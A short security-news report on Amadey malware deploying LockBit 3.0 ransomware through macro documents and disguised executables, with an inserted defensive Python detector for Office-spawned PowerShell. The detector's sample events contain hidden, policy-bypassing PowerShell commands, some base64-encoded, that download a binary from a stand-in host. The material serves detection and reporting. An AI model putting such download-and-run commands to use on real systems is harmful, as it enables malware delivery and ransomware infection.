Amadey Bot Spotted Deploying LockBit 3.0 Ransomware on Hacked Machines
2022-11-08 14:52

The Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems, researchers have warned.

The document contains a malicious VBA macro that, when enabled by the victim, runs a PowerShell command to download and run Amadey.

In an alternative attack chain, Amadey is disguised as a seemingly harmless file bearing a Word icon but is actually an executable that's propagated via a phishing message.

Once Amadey executes successfully, it fetches and launches additional commands from a remote server, which include the LockBit ransomware in either PowerShell or binary format.
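A defender can hunt for the macro-to-PowerShell download step described above in process-creation telemetry. The following is an added example, not code from the article or the researchers; the event field names (modelled on Sysmon Event ID 1), the process lists, and the sample events are assumptions constructed for illustration.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
DOWNLOAD_HINTS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer|https?://", re.I)
# PowerShell accepts any prefix of -EncodedCommand (-e, -enc, ...).
ENCODED_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def effective_command(cmdline):
    """Command line plus every -EncodedCommand payload that decodes cleanly."""
    parts = [cmdline]
    for m in ENCODED_ARG.finditer(cmdline):
        try:
            parts.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            pass  # not a base64 payload (e.g. a long parameter value)
    return " ".join(parts)

def classify(event):
    """None, 'medium' (Office spawned a script host) or 'high' (and it downloads)."""
    if (basename(event["ParentImage"]) not in OFFICE_PARENTS
            or basename(event["Image"]) not in SCRIPT_HOSTS):
        return None
    cmd = effective_command(event["CommandLine"])
    return "high" if DOWNLOAD_HINTS.search(cmd) else "medium"

def encode_ps(script):  # builds the constructed encoded sample below
    return base64.b64encode(script.encode("utf-16-le")).decode()

WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events; field names assume Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"ParentImage": WORD, "Image": PS,
     "CommandLine": "powershell -w hidden Invoke-WebRequest http://example.invalid/a.bin"},
    {"ParentImage": WORD, "Image": PS,
     "CommandLine": "powershell -ep bypass -enc " + encode_ps("iwr http://example.invalid/a.bin")},
    {"ParentImage": WORD, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c dir"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell Invoke-WebRequest http://example.invalid/a.bin"},
]

if __name__ == "__main__":
    print([classify(e) for e in SAMPLE_EVENTS])
```

The parent-process check does not cover the alternative chain, where the victim launches the disguised executable directly, so that path needs separate coverage such as attachment filtering or application control.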

LockBit 3.0, also known as LockBit Black, launched in June 2022, alongside a new dark web portal and the very first bug bounty program for a ransomware operation, promising rewards of up to $1 million for finding bugs in its website and software.

"As LockBit ransomware is being distributed through various methods, user caution is advised," the researchers concluded.


News URL

https://thehackernews.com/2022/11/amadey-bot-spotted-deploying-lockbit-30.html